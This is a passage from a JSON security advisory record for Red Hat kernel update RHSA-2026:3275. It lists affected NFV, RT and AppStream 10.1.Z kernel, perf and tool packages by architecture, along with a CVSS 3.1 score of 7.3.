"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3275"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
